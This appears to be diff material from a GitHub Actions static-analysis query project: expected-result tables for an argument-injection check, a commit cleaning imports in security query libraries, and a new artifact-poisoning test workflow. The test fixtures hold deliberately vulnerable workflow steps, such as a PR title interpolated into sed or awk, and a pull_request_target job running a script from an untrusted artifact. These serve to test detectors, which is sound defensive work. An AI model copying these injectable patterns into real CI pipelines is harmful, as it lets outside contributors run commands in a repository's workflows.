.github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 90e7101e5fd..12171d8c7f2 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -1,20 +1,23 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select From c5c3cd1726b135e24958f8c6f2b26b872850b4d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:47:35 +0200 Subject: [PATCH 0589/1267] Clean imports --- .../security/ArgumentInjectionQuery.qll | 1 - .../security/ArtifactPoisoningQuery.qll | 1 - .../actions/security/CachePoisoningQuery.qll | 2 -- .../codeql/actions/security/ControlChecks.qll | 3 +++ .../security/EnvPathInjectionQuery.qll | 23 ++++++++----------- .../actions/security/EnvVarInjectionQuery.qll | 3 --- .../security/OutputClobberingQuery.qll | 3 --- .../actions/security/PoisonableSteps.qll | 1 - .../security/SecretExfiltrationQuery.qll | 1 - .../actions/security/SelfHostedQuery.qll | 1 - .../UseOfKnownVulnerableActionQuery.qll | 1 - .../CompositeActionsSinks.ql | 0 .../CompositeActionsSources.ql | 0 .../CompositeActionsSummaries.ql | 0 .../ReusableWorkflowsSinks.ql | 0 .../ReusableWorkflowsSources.ql | 0 .../ReusableWorkflowsSummaries.ql | 0 .../Security/CWE-074/OutputClobberingHigh.ql | 1 + .../CWE-077/EnvPathInjectionCritical.ql | 1 + .../CWE-077/EnvPathInjectionMedium.ql | 1 + .../CWE-077/EnvVarInjectionCritical.ql | 1 + .../Security/CWE-077/EnvVarInjectionMedium.ql | 1 + .../Models/CompositeActionsSinks.qlref | 2 +- .../Models/CompositeActionsSources.qlref | 2 +- .../Models/CompositeActionsSummaries.qlref | 2 +- .../Models/ReusableWorkflowsSinks.qlref | 2 +- .../Models/ReusableWorkflowsSources.qlref | 2 +- .../Models/ReusableWorkflowsSummaries.qlref | 2 +- .../workflows/artifactpoisoning101.yml | 19 +++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 1 + 33 files changed, 52 insertions(+), 33 deletions(-) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSummaries.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.ql (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index f7e4a983445..1d461cca3df 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow abstract class ArgumentInjectionSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d06b125ca32..9355462962d 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -1,7 +1,6 @@ import actions private import codeql.actions.TaintTracking import codeql.actions.DataFlow -private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index a0113beed46..e5c5a365510 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,6 +1,4 @@ import actions -import codeql.actions.config.Config -import codeql.actions.Helper string defaultBranchTriggerEvent() { result = diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 86c7d989522..3b15fc78d10 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -253,6 +253,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { or this.getArgument("exit") = "true" ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 859f625e068..33efc9b1bc8 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -3,20 +3,11 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } /** * Holds if a Run step declares a PATH environment variable with contents from a local file. - * e.g. - * run: | - * cat foo.txt >> $GITHUB_PATH - * echo "$(cat foo.txt)" >> $GITHUB_PATH - * FOO=$(cat foo.txt) - * echo "$FOO" >> $GITHUB_PATH */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { @@ -28,11 +19,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( + // echo "$(cat foo.txt)" >> $GITHUB_PATH + // FOO=$(cat foo.txt) + // echo "$FOO" >> $GITHUB_PATH exists(string cmd | - run.getScript().getACmdReachingGitHubPathWrite(cmd) and - run.getScript().getAFileReadCommand() = cmd + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubPathWrite(cmd) ) or + // cat foo.txt >> $GITHUB_PATH run.getScript().fileToGitHubPath(_) ) ) @@ -91,8 +86,10 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and ( - run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or - run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + or run.getScript().getAnEnvReachingGitHubPathWrite(var) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 13d6312b585..99e9537a857 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index e959c7d60ca..58b7b18ca62 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class OutputClobberingSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 0cc8f913166..5e62aa675ee 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config abstract class PoisonableStep extends Step { } diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 0317ab28199..18a480b1cec 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 419b2ac81a9..14d36ef0fa8 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll index bbb021fe3d5..920b8ab9d20 100644 --- a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config class KnownVulnerableAction extends UsesStep { string vulnerable_action; diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Models/CompositeActionsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSinks.ql rename to ql/src/Models/CompositeActionsSinks.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Models/CompositeActionsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSources.ql rename to ql/src/Models/CompositeActionsSources.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Models/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSummaries.ql rename to ql/src/Models/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Models/ReusableWorkflowsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql rename to ql/src/Models/ReusableWorkflowsSinks.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Models/ReusableWorkflowsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSources.ql rename to ql/src/Models/ReusableWorkflowsSources.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Models/ReusableWorkflowsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql rename to ql/src/Models/ReusableWorkflowsSummaries.ql diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 2000e2100ae..9c9c2e4d139 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.OutputClobberingQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 54e013f1091..7d8a3b49009 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph +import codeql.actions.dataflow.FlowSources import codeql.actions.security.ControlChecks from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index 7ca8f4a2838..a1499764ef3 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery +import codeql.actions.dataflow.FlowSources import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index ad97dd3caef..540edfd8b5f 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 70c05fc1c95..c9af38a2c50 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref index f8e1bfca630..e5cb225ed24 100644 --- a/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1 @@ -Security/CWE-020/CompositeActionsSinks.ql +Models/CompositeActionsSinks.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref index dce31c31923..3b833d66912 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSources.ql +Models/CompositeActionsSources.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index 007941cd2f5..ea9b7a304e6 100644 --- a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSummaries.ql +Models/CompositeActionsSummaries.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index 369befbce62..fa8344d4bf9 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSinks.ql +Models/ReusableWorkflowsSinks.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index cbea721ee34..fe4299bdba4 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSources.ql +Models/ReusableWorkflowsSources.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index ff87d53c3d6..3547c8a4d07 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSummaries.ql +Models/ReusableWorkflowsSummaries.ql diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml new file mode 100644 index 00000000000..7eaee9fa6d3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + - id: pr_number + run: | + PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7a59ab6ec60..5c784595dbe 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | 